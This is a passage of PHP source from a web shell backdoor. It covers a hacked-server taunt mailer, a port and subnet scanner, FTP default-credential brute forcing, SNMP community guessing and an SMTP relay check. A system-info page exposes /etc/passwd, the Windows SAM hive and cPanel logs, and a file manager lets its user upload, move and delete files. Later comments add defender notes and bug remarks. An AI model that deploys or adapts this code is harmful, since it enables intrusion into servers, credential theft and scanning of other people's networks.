echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\"><td><b>Mailer:</b></td></tr><td width=\"20%\" bgcolor=\"#666666\">SMTP</td><td bgcolor=\"#666666\">".ini_get('SMTP')." (".ini_get('smtp_port').")</td></tr><tr><td bgcolor=\"#808080\">From:</td><td bgcolor=\"#808080\"><input name=from type=text value=\"evil@hell.gov\" size=55>$hcwd</td><tr><td width=\"25%\" bgcolor=\"#666666\">To:</td><td bgcolor=\"#666666\"><input name=to type=text value=\""; if (!empty($_REQUEST['to'])) echo htmlspecialchars($_REQUEST['to']); elseif(!empty($_ENV["SERVER_ADMIN"])) echo $_ENV["SERVER_ADMIN"];else echo "admin@".getenv('HTTP_HOST'); echo "\" size=55></td></tr><tr><td bgcolor=\"#808080\">Subject:</td><td bgcolor=\"#808080\"><input name=subject type=text value=\"YOUR SERVER HAS BEED HACKED :-P\" size=55></td><tr><td bgcolor=\"#666666\">Body:</td><td bgcolor=\"#666666\"><textarea rows=\"18\" cols=\"43\" name=body>Admin, your system has been hacked! if you don`t seCure it, next time i`ll format your box.</textarea></td></tr><tr><td width=\"10%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=\"right\"><input type=submit class=buttons value=Send></form>$et";
}
 384 function scanneR(){
 385 global $hcwd;
 386 if (!empty($_SERVER["SERVER_ADDR"])) $host=$_SERVER["SERVER_ADDR"];else $host ="127.0.0.1";
 387 $udp=(empty($_REQUEST['udp']))?0:1;$tcp=(empty($_REQUEST['tcp']))?0:1;
 388 if (($udp||$tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])){
 389 $target=$_REQUEST['target'];$from=(int) $_REQUEST['fromport'];$to=(int)$_REQUEST['toport'];$timeout=(int)$_REQUEST['timeout'];$nu = 0;
 390 echo "<font color=blue>Port scanning started against ".htmlspecialchars($target).":<br>";
 391 $start=time();
 392 for($i=$from;$i<=$to;$i++){
 393 if($tcp){
 394 if (checkthisporT($target,$i,$timeout)){
 395 $nu++;
 396 $ser="";
 397 if(getservbyport($i,"tcp"))$ser="(".getservbyport($i,"tcp").")";
 398 echo "$nu) $i $ser (<a href=\"telnet://$target:$i\">Connect</a>) [TCP]<br>";
 399 }
 400 }
 401 if($udp)if(checkthisporT($target,$i,$timeout,1)){$nu++;$ser="";if(getservbyport($i,"udp"))$ser="(".getservbyport($i,"udp").")";echo "$nu) $i $ser [UDP]<br>";}
 402 flusheR();
 403 }
 404 $time=time()-$start;
 405 echo "Done! ($time seconds)</font>";
 406 }
 407 elseif (!empty($_REQUEST['securityscanner'])){
 408 echo "<font color=blue>";
 409 $start=time();
 410 $from=$_REQUEST['from'];
 411 $to=(int)$_REQUEST['to'];
 412 $timeout=(int)$_REQUEST['timeout'];
 413 $f = substr($from,strrpos($from,".")+1);
 414 $from = substr($from,0,strrpos($from,"."));
 415 if(!empty($_REQUEST['httpscanner'])){
 416 echo "Loading webserver bug list...";
 417 flusheR();
 418 $buglist=whereistmP().DIRECTORY_SEPARATOR.namE();
 419 $dl=@downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db',$buglist);
 420 if($dl){$file=file($buglist);echo "Done! scanning started.<br><br>";}else echo "Failed!!! scanning started without webserver security testing...<br><br>";
 421 flusheR();
 422 }else {$fr=htmlspecialchars($from); echo "Scanning $fr.$f-$fr.$to:<br><br>";}
 423 for($i=$f;$i<=$to;$i++){
 424 $output=0;
 425 $ip="$from.$i";
 426 if(!empty($_REQUEST['nslookup'])){
 427 $hn=gethostbyaddr($ip);
 428 if($hn!=$ip)echo "$ip [$hn]<br>";}
 429 flusheR();
 430 if(!empty($_REQUEST['ipscanner'])){
 431 $port=$_REQUEST['port'];
 432 if(strstr($port,","))$p=explode(",",$port);else $p[0]=$port;
 433 $open=$ser="";
 434 foreach($p as $po){
 435 $scan=checkthisporT($ip,$po,$timeout);
 436 if ($scan){
 437 $ser="";
 438 if($ser=getservbyport($po,"tcp"))$ser="($ser)";
 439 $open.=" $po$ser ";
 440 }
 441 }
 442 if($open){echo "$ip) Open ports:$open<br>";$output=1;}
 443 flusheR();
 444 }
 445 if(!empty($_REQUEST['httpbanner'])){
 446 $res=get_sw_namE($ip,$timeout);
 447 if($res){
 448 echo "$ip) Webserver software: ";
 449 if($res==-1)echo "Unknow";
 450 else echo $res;
 451 echo "<br>";
 452 $output=1;
 453 }
 454 flusheR();
 455 }
 456 if(!empty($_REQUEST['httpscanner'])){
 457 if(checkthisporT($ip,80,$timeout) && !empty($file)){
 458 $admin=array('/admin/','/adm/');
 459 $users=array('adm','bin','daemon','ftp','guest','listen','lp','mysql','noaccess','nobody','nobody4','nuucp','operator','root','smmsp','smtp','sshd','sys','test','unknown','uucp','web','www');
 460 $nuke=array('/','/postnuke/','/postnuke/html/','/modules/','/phpBB/','/forum/');
 461 $cgi=array('/cgi.cgi/','/webcgi/','/cgi-914/','/cgi-915/','/bin/','/cgi/','/mpcgi/','/cgi-bin/','/ows-bin/','/cgi-sys/','/cgi-local/','/htbin/','/cgibin/','/cgis/','/scripts/','/cgi-win/','/fcgi-bin/','/cgi-exe/','/cgi-home/','/cgi-perl/');
 462 foreach ($file as $v){
 463 $vuln=array();
 464 $v=trim($v);
 465 if(!$v || $v{0}=='#')continue;
 466 $v=str_replace('","','^',$v);
 467 $v=str_replace('"','',$v);
 468 $vuln=explode('^',$v);
 469 $page=$cqich=$nukech=$adminch=$userch=$vuln[1];
 470 if(strstr($page,'@CGIDIRS'))
 471 foreach($cgi as $cg){
 472 $cqich=str_replace('@CGIDIRS',$cg,$page);
 473 $url="http://$ip$cqich";
 474 $res=check_urL($url,$vuln[3],$vuln[2],$timeout);
 475 if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
 476 flusheR();
 477 }
 478 elseif(strstr($page,'@ADMINDIRS'))
 479 foreach ($admin as $cg){
 480 $adminch=str_replace('@ADMINDIRS',$cg,$page);
 481 $url="http://$ip$adminch";
 482 $res=check_urL($url,$vuln[3],$vuln[2],$timeout);
 483 if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
 484 flusheR();
 485 }
 486 elseif(strstr($page,'@USERS'))
 487 foreach ($users as $cg){
 488 $userch=str_replace('@USERS',$cg,$page);
 489 $url="http://$ip$userch";
 490 $res=check_urL($url,$vuln[3],$vuln[2],$timeout);
 491 if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
 492 flusheR();
 493 }
 494 elseif(strstr($page,'@NUKE'))
 495 foreach ($nuke as $cg){
 496 $nukech=str_replace('@NUKE',$cg,$page);
 497 $url="http://$ip$nukech";
 498 $res=check_urL($url,$vuln[3],$vuln[2],$timeout);
 499 if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
 500 flusheR();
 501 }
 502 else{
 503 $url="http://$ip$page";
 504 $res=check_urL($url,$vuln[3],$vuln[2],$timeout);
 505 if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
 506 flusheR();
 507 }
 508 }
 509 }
 510 }
 511 if(!empty($_REQUEST['smtprelay'])){
 512 if(checkthisporT($ip,25,$timeout)){
 513 $res='';
 514 $res=checksmtP($ip,$timeout);
 515 if($res==1){echo "$ip) SMTP relay found.<br>";$output=1;}flusheR();
 516 }
 517 }
 518 if(!empty($_REQUEST['snmpscanner'])){
 519 if(checkthisporT($ip,161,$timeout,1)){
 520 $com=$_REQUEST['com'];
 521 $coms=$res="";
 522 if(strstr($com,","))$c=explode(",",$com);else $c[0]=$com;
 523 foreach ($c as $v){
 524 $ret=snmpchecK($ip,$v,$timeout);
 525 if($ret)$coms .=" $v ";
 526 }
 527 if ($coms!=""){echo "$ip) SNMP FOUND: $coms<br>";$output=1;}
 528 flusheR();
 529 }
 530 }
 531 if(!empty($_REQUEST['ftpscanner'])){
 532 if(checkthisporT($ip,21,$timeout)){
 533 $usps=explode(',',$_REQUEST['userpass']);
 534 foreach ($usps as $v){
 535 $user=substr($v,0,strpos($v,':'));
 536 $pass=substr($v,strpos($v,':')+1);
 537 if($pass=='[BLANK]')$pass='';
 538 $ftp=@ftp_connect($ip,21,$timeout);
 539 if ($ftp){
 540 if(@ftp_login($ftp,$user,$pass)){$output=1;echo "$ip) FTP FOUND: ($user:$pass) <a href=\"ftp://$ip\" target=\"_blank\">$ip</a> System type: ".ftp_systype($ftp)."<br>";}
 541 }
 542 flusheR();
 543 }
 544 }
 545 }
 546 if($output)echo "<hr size=1 noshade>";
 547 flusheR();
 548 }
 549 $time=time()-$start;
 550 echo "Done! ($time seconds)</font>";
 551 if(!empty($buglist))unlink($buglist);
 552 }
 553 else{
 554 $chbox=(extension_loaded('sockets'))?"<input type=checkbox name=tcp value=1 checked>TCP<input type=checkbox name=udp value=1 checked>UDP":"<input type=hidden name=tcp value=1>";
 555 echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\"><td>Port scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">Target:</td><td bgcolor=\"#808080\" width=80%><input name=target value=$host size=40></td></tr><tr><td bgcolor=\"#666666\" width=25%>From:</td><td bgcolor=\"#666666\" width=25%><input name=fromport type=text value=\"1\" size=5></td></tr><tr><td bgcolor=\"#808080\" width=25%>To:</td><td bgcolor=\"#808080\" width=25%><input name=toport type=text value=\"1024\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Timeout:</td><td bgcolor=\"#666666\"><input name=timeout type=text value=\"2\" size=5></td><tr><td width=\"25%\" bgcolor=\"#808080\">$chbox</td><td bgcolor=\"#808080\" align=\"right\">$hcwd<input type=submit class=buttons name=portscanner value=Scan></td></tr></form></table>";
 556 $host = substr($host,0,strrpos($host,"."));
 557 echo "<br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\" name=security><td>security scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">From:</td><td bgcolor=\"#808080\" width=80%><input name=from value=$host.1 size=40> <input type=checkbox value=1 style=\"border-width:1px;background-color:#808080;\" name=nslookup checked>NS lookup</td></tr><tr><td bgcolor=\"#666666\" width=25%>To:</td><td bgcolor=\"#666666\" width=25%>xxx.xxx.xxx.<input name=to type=text value=254 size=4>$hcwd</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Timeout:</td><td bgcolor=\"#808080\"><input name=timeout type=text value=\"2\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ipscanner value=1 checked onClick=\"document.security.port.disabled = !document.security.port.disabled;\" style=\"border-width:1px;background-color:#666666;\">Port scanner:</td><td bgcolor=\"#666666\"><input name=port type=text value=\"21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=httpbanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Get web banner</td><td bgcolor=\"#808080\"><input type=checkbox name=httpscanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Webserver security scanning&nbsp;&nbsp;&nbsp;<input type=checkbox name=smtprelay value=1 checked style=\"border-width:1px;background-color:#808080;\">SMTP relay check</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ftpscanner value=1 checked onClick=\"document.security.userpass.disabled = !document.security.userpass.disabled;\" style=\"border-width:1px;background-color:#666666;\">FTP password:</td><td bgcolor=\"#666666\"><input name=userpass type=text 
value=\"anonymous:admin@nasa.gov,ftp:ftp,Administrator:[BLANK],guest:[BLANK]\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=snmpscanner value=1 onClick=\"document.security.com.disabled = !document.security.com.disabled;\" checked style=\"border-width:1px;background-color:#808080;\">SNMP:</td><td bgcolor=\"#808080\"><input name=com type=text value=\"public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,agent,manager,OrigEquipMfr,default,tivoli,openview,community,snmp,snmpd,Secret C0de,security,rmon,rmon_admin,hp_admin,NoGaH$@!,agent_steal,freekevin,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,apc,TENmanUFactOryPOWER,proxy,core,regional\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=\"right\"><input type=submit class=buttons name=securityscanner value=Scan></td></tr></form></table></center><br><center>";
 558 }
 559 }
 560 function sysinfO(){
// Renders the "Server information" and "User information" HTML tables:
// OS/kernel, web server, CPU, disk usage, current user, PHP/Zend version,
// loaded extensions, disabled functions, safe_mode/open_basedir state, and
// which DBMS client extensions and cURL are present. Everything is echoed
// directly; nothing is returned.
// Depends on helpers and globals declared elsewhere in the file: shelL(),
// php_unamE(), showsizE(), hlinK(), $windows, $disablefunctions, $safemode.
// Defender note: the rendered page carries fixed strings such as
// "Operation system:", "Sam file:" and "Cpanel log file:" that serve as
// response-body signatures for this shell.
 561 global $windows,$disablefunctions,$safemode;
 562 $cwd= getcwd();
// $mil is an opening <a> tag prefix; each OS/software name below is wrapped
// into a milw0rm exploit-search link built from it.
 563 $mil="<a target=\"_blank\" href=\"http://www.milw0rm.org/related.php?program=";
// Reports "ON" whenever open_basedir has any non-empty value (the second
// operand only matters for a literal "on").
 564 $basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";
 565 if (!empty($_SERVER["PROCESSOR_IDENTIFIER"])) $CPU = $_SERVER["PROCESSOR_IDENTIFIER"];
 566 $osver=$tsize=$fsize='';
 567 if ($windows){ 
// Windows: run "ver" and "echo %systemroot%" through shelL(), fall back to
// $_SERVER/getenv for the system root, then sum free/total space over drive
// letters B: to Z: (chr(66)..chr(90)) with errors suppressed by @.
 568 $osver = "  (".shelL("ver").")";
 569 $sysroot = shelL("echo %systemroot%");
 570 if (empty($sysroot)) $sysroot = $_SERVER["SystemRoot"];
 571 if (empty($sysroot)) $sysroot = getenv("windir");
 572 if (empty($sysroot)) $sysroot = "Not Found";
 573 if (empty($CPU))$CPU = shelL("echo %PROCESSOR_IDENTIFIER%");
 574 for ($i=66;$i<=90;$i++){
 575 $drive= chr($i).':\\';
 576 if (is_dir($drive)){
 577 $fsize+=@disk_free_space($drive);
 578 $tsize+=@disk_total_space($drive);
 579 }
 580 }
 581 }else{
// Non-Windows: only the root filesystem is reported.
 582 $fsize=disk_free_space('/');
 583 $tsize=disk_total_space('/');
 584 }
 585 $disksize="Used spase: ". showsizE($tsize-$fsize) . "   Free space: ". showsizE($fsize) . "   Total space: ". showsizE($tsize);
 586 if (empty($CPU)) $CPU = "Unknow";
 587 $os = php_unamE();
 588 $osn=php_unamE('s');
 589 if(!$windows){ 
// Link the OS name and kernel release to milw0rm; ':' is the include_path
// separator that gets replaced by a space further down.
 590 $ker = php_unamE('r');
 591 $o=($osn=="Linux")?"Linux+Kernel":$osn;
 592 $os = str_replace($osn,"${mil}$o\">$osn</a>",$os);
 593 $os = str_replace($ker,"${mil}Linux+Kernel\">$ker</a>",$os);
 594 $inpa=':';
 595 }else{
// $sam is the path of the SAM registry hive whose readability is reported
// below; a web-server account able to read it is a credential-exposure
// finding on its own and worth checking on any host running this script.
 596 $sam = $sysroot."\\system32\\config\\SAM";
 597 $inpa=';';
 598 $os = str_replace($osn,"${mil}MS+Windows\">$osn</a>",$os);
 599 }
// SERVER_SOFTWARE is interpolated into the page without escaping.
 600 $software=str_replace("Apache","${mil}Apache\">Apache</a>",$_SERVER['SERVER_SOFTWARE']);
// Server table: host (+ address), OS (+ "ver" output on Windows), web server,
// CPU, disk, USERDOMAIN and get_current_user(), each with an "Unknow" fallback.
 601 echo "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td>Server information:</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\">".$_SERVER["HTTP_HOST"]; if (!empty($_SERVER["SERVER_ADDR"])){ echo "(". $_SERVER["SERVER_ADDR"] .")";}echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Operation system:</td><td bgcolor=\"#808080\">$os$osver</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Web server application:</td><td bgcolor=\"#666666\">$software</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">CPU:</td><td bgcolor=\"#808080\">$CPU</td></tr><td width=\"25%\" bgcolor=\"#666666\">Disk status:</td><td bgcolor=\"#666666\">$disksize</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">User domain:</td><td bgcolor=\"#808080\">";if (!empty($_SERVER['USERDOMAIN'])) echo $_SERVER['USERDOMAIN'];else echo "Unknow"; echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">User name:</td><td bgcolor=\"#666666\">";$cuser=get_current_user();if (!empty($cuser)) echo get_current_user();else echo "Unknow"; echo "</td></tr>";
 602 if ($windows){
// Links the Windows directory into the file manager and, when the SAM hive
// is readable, offers it through the downloaD handler.
 603 echo "<tr><td width=\"25%\" bgcolor=\"#808080\">Windows directory:</td><td bgcolor=\"#808080\"><a href=\"".hlinK("seC=fm&workingdiR=$sysroot")."\">$sysroot</a></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Sam file:</td><td bgcolor=\"#666666\">";if (is_readable(($sam)))echo "<a href=\"".hlinK("?workingdiR=$sysroot\\system32\\config&downloaD=sam")."\">Readable</a>"; else echo "Not readable";echo "</td></tr>";
 604 }
 605 else
 606 {
// Reports whether /etc/passwd and cPanel's /var/cpanel/accounting.log are
// readable, linking readable ones into the editor.
 607 echo "<tr><td width=\"25%\" bgcolor=\"#808080\">Passwd file:</td><td bgcolor=\"#808080\">";
 608 if (is_readable('/etc/passwd')) echo "<a href=\"".hlinK("seC=edit&filE=/etc/passwd&workingdiR=$cwd")."\">Readable</a>"; else echo'Not readable';echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Cpanel log file:</td><td bgcolor=\"#666666\">";
 609 if (file_exists("/var/cpanel/accounting.log")){if (is_readable("/var/cpanel/accounting.log")) echo "<a href=\"".hlinK("seC=edit&filE=/var/cpanel/accounting.log&workingdiR=$cwd")."\">Readable</a>"; else echo "Not readable";}else echo "Not found";
 610 echo "</td></tr>";
 611 }
// Client address as seen by the server; shown in the user table.
 612 $uip =(!empty($_SERVER['REMOTE_ADDR']))?$_SERVER['REMOTE_ADDR']:getenv('REMOTE_ADDR');
// php_logo_guid()/zend_logo_guid() were removed in PHP 5.5, so this
// statement is fatal on any current PHP release. The DBMS row probes client
// extensions with function_exists(); the mysql_/mssql_/ora_/sqlite_/msql_/
// ovrimos_ functions it looks for no longer exist in PHP 7+.
 613 echo "<tr><td width=\"25%\" bgcolor=\"#808080\">${mil}PHP\">PHP</a> version:</td><td bgcolor=\"#808080\"><a href=\"?=".php_logo_guid()."\" target=\"_blank\">".PHP_VERSION."</a> (<a href=\"".hlinK("seC=phpinfo&workingdiR=$cwd")."\">more...</a>)</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Zend version:</td><td bgcolor=\"#666666\">";if (function_exists('zend_version')) echo "<a href=\"?=".zend_logo_guid()."\" target=\"_blank\">".zend_version()."</a>";else echo "Not Found";echo "</td><tr><td width=\"25%\" bgcolor=\"#808080\">Include path:</td><td bgcolor=\"#808080\">".str_replace($inpa," ",DEFAULT_INCLUDE_PATH)."</td><tr><td width=\"25%\" bgcolor=\"#666666\">PHP Modules:</td><td bgcolor=\"#666666\">";$ext=get_loaded_extensions();foreach($ext as $v)echo $v." ";echo "</td><tr><td width=\"25%\" bgcolor=\"#808080\">Disabled functions:</td><td bgcolor=\"#808080\">";if(!empty($disablefunctions))echo $disablefunctions;else echo "Nothing"; echo"</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Safe mode:</td><td bgcolor=\"#666666\">$safemode</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Open base dir:</td><td bgcolor=\"#808080\">$basedir</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">DBMS:</td><td bgcolor=\"#666666\">";$sq="";if(function_exists('mysql_connect')) $sq= "${mil}MySQL\">MySQL</a> ";if(function_exists('mssql_connect')) $sq.= " ${mil}MSSQL\">MSSQL</a> ";if(function_exists('ora_logon')) $sq.= " ${mil}Oracle\">Oracle</a> ";if(function_exists('sqlite_open')) $sq.= " SQLite ";if(function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL\">PostgreSQL</a> ";if(function_exists('msql_connect')) $sq.= " mSQL ";if(function_exists('mysqli_connect'))$sq.= " MySQLi ";if(function_exists('ovrimos_connect')) $sq.= " Ovrimos SQL ";if ($sq=="") $sq= "Nothing"; echo "$sq</td></tr>";if (function_exists('curl_init')) echo "<tr><td width=\"25%\" bgcolor=\"#808080\">cURL support:</td><td bgcolor=\"#808080\">Enabled 
";if(function_exists('curl_version')){$ver=curl_version();echo "(Version:". $ver['version']." OpenSSL version:". $ver['ssl_version']." zlib version:". $ver['libz_version']." host:". $ver['host'] .")";}echo "</td></tr>";echo "<tr><td>User information:</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">IP:</td><td bgcolor=\"#666666\">$uip</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Agent:</td><td bgcolor=\"#808080\">".getenv('HTTP_USER_AGENT')."</td></tr></table>";
 614 }
 615 function checksuM($file){
 616 global $et;
 617 echo "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\"><tr><td width=\"10%\" bgcolor=\"#666666\"><b>MD5:</b> <font color=#F0F0F0>".md5_file($file)."</font><br><b>SHA1:</b> <font color=#F0F0F0>".sha1_file($file)."</font>$et";
 618 }
 619 function listdiR($cwd,$task){
// Recursively walks $cwd and prints one "[<a ...>path</a>]" line per entry
// that matches $task: '0' everything, '1' writable, '2' writable files,
// '3' writable dirs, '4' files, '5' dirs, '6' regex match on the entry
// name, '7' substring match. Cases are string literals but switch compares
// loosely, so an integer task matches too. Links are built with hlinK()
// (declared elsewhere in the file).
// Defender note: a single request to this handler produces a readdir()
// walk of the entire subtree by the web-server user; file-access auditing
// on the web root makes that burst visible.
 620 $c= getcwd();
// $dh is never closed; each recursion level holds its handle until the
// script ends.
 621 $dh = opendir($cwd);
// Using readdir() as the loop condition stops early on an entry literally
// named "0", which is falsy.
 622 while ($cont=readdir($dh)){
 623 if($cont=='.' || $cont=='..')continue;
 624 $adr = $cwd.DIRECTORY_SEPARATOR.$cont;
 625 switch ($task){
 626 case '0':if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break;
// Case '1': only the file link is guarded by is_writeable(); the directory
// link is printed regardless of writability.
 627 case '1':if(is_writeable($adr))if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break;
 628 case '2':if(is_file($adr) &&  is_writeable($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";break;
 629 case '3':if(is_dir($adr) && is_writeable($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break;
 630 case '4':if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";break;
 631 case '5':if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break;
// The request-supplied search string is interpolated into the pattern as-is
// (no preg_quote), so a value containing '@' or bad syntax triggers a PCRE
// warning and the match fails.
 632 case '6':if(preg_match("@".$_REQUEST['search']."@",$cont)){if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";}break;
 633 case '7':if(strstr($cont,$_REQUEST['search'])){if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";}break;
 634 }
// Recursion re-reads the task from $_REQUEST rather than passing $task on;
// is_dir() follows symlinks, so a link pointing back up the tree can make
// this recurse until PHP's limits stop it.
 635 if (is_dir($adr)) listdiR($adr,$_REQUEST['task']);
 636 }
 637 }
// Stub fallbacks so the file manager's owner lookup still runs on builds
// without the posix extension; the stubs return 0, which callers treat as
// "owner unknown". The strstr() guard skips declaration when the name is
// listed in $disablefunctions (a global from earlier in the file) —
// presumably because function_exists() is false for a disabled function and
// redeclaring it would fatal; confirm against the PHP build in use.
 638 if (!function_exists("posix_getpwuid") && !strstr($disablefunctions,'posix_getpwuid')) {function posix_getpwuid($u) {return 0;}}
 639 if (!function_exists("posix_getgrgid") && !strstr($disablefunctions,'posix_getgrgid')) {function posix_getgrgid($g) {return 0;}}
 640 function filemanager(){
// File-manager page: handles the copy/move/rename (cP/mV/rN + deS), delete
// (deL), upload (uploadfile), new file/folder (newf + newfile/newdir) and
// recursive search (task/search/re) request parameters, then lists the
// current directory with per-entry action menus. All HTML is echoed
// directly. Helpers used but declared elsewhere: hlinK(), listdiR(),
// renamE(), shelL(), showsizE(), flusheR(); globals $msgbox/$errorbox/$t/
// $et/$hcwd hold HTML fragments and $windows selects the drive list.
// The process cwd is expected to already equal $cwd (the script chdir()s
// to workingdiR earlier), since entry paths below are used relative.
// Defender note: a multipart POST carrying a field named "uploadfile" to
// this script is the upload signature; file-integrity monitoring of the
// web root catches the resulting write.
 641 global $windows,$msgbox,$errorbox,$t,$et,$hcwd;
 642 $cwd= getcwd();
// Table/cell prefixes reused throughout: alternating grey shades, red for
// unreadable entries, green for writable ones.
 643 $table = "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\">";
 644 $td1n="<td width=\"22%\" bgcolor=\"#666666\">";
 645 $td2m="<td width=\"22%\" bgcolor=\"#808080\">";
 646 $td1i="<td width=\"5%\" bgcolor=\"#666666\">";
 647 $td2i="<td width=\"5%\" bgcolor=\"#808080\">";
 648 $tdnr="<td width=\"22%\" bgcolor=\"#800000\">";
 649 $tdw="<td width=\"22%\" bgcolor=\"#006E00\">";
// Search/filter mode: a non-empty "search" forces task 7 (substring) and a
// non-empty "re" then forces task 6 (regex), so regex wins when both are
// sent. The listing itself is delegated to listdiR().
 650 if (!empty($_REQUEST['task'])){
 651 if (!empty($_REQUEST['search'])) $_REQUEST['task'] = 7;
 652 if (!empty($_REQUEST['re'])) $_REQUEST['task'] = 6;
 653 echo "<font color=blue><pre>";
 654 listdiR($cwd,$_REQUEST['task']);
 655 echo "</pre></font>";
 656 }else{
// Copy / move / rename: first request shows a destination prompt, the
// follow-up request (with deS set) performs the operation.
 657 if (!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])|| !empty($_REQUEST['rN'])){
 658 if (!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])){
 659 $title="Destination";
 660 $ad = (!empty($_REQUEST['cP']))?$_REQUEST['cP']:$_REQUEST['mV'];
 661 $dis =(!empty($_REQUEST['cP']))?'Copy':'Move';
 662 }else{
 663 $ad = $_REQUEST['rN'];
 664 $title ="New name";
 665 $dis = "Rename";
 666 }
// "!!empty(x)" is just empty(x): no destination yet -> show the form.
 667 if (!!empty($_REQUEST['deS'])){
 668 echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"100%\" bgcolor=\"#333333\">$title:</td></tr><tr>$td1n<form method=\"POST\"><input type=text value=\"";if(empty($_REQUEST['rN'])) echo $cwd; echo "\" size=60 name=deS></td></tr><tr>$td2m$hcwd<input type=hidden value=\"".htmlspecialchars($ad)."\" name=cp><input class=buttons type=submit value=$dis></td></tr></form></table></center>";
 669 }else{
 670 if (!empty($_REQUEST['rN'])) renamE($ad,$_REQUEST['deS']);
 671 else{
// Move is copy() followed by unlink(); neither return value is checked.
 672 copy($ad,$_REQUEST['deS']);
 673 if (!empty($_REQUEST['mV']))unlink($ad);
 674 }
 675 }
 676 }
// Delete: files and symlinks are unlinked; a directory is only rmdir()'d
// when readdir() yields no more than "." and "..". $d starts as "" and is
// incremented as a string. Note the message and rmdir() read the key
// 'del' (lowercase) while the checks above use 'deL' — with only deL in
// the request that index is undefined and rmdir() gets an empty path.
 677 if (!empty($_REQUEST['deL'])) { if (is_file($_REQUEST['deL'])|| is_link($_REQUEST['deL'])) unlink($_REQUEST['deL']);elseif(is_dir($_REQUEST['deL'])) {
 678 $dh = opendir($_REQUEST['deL']);
 679 $d="";
 680 while ($cont=readdir($dh)){$d++;}
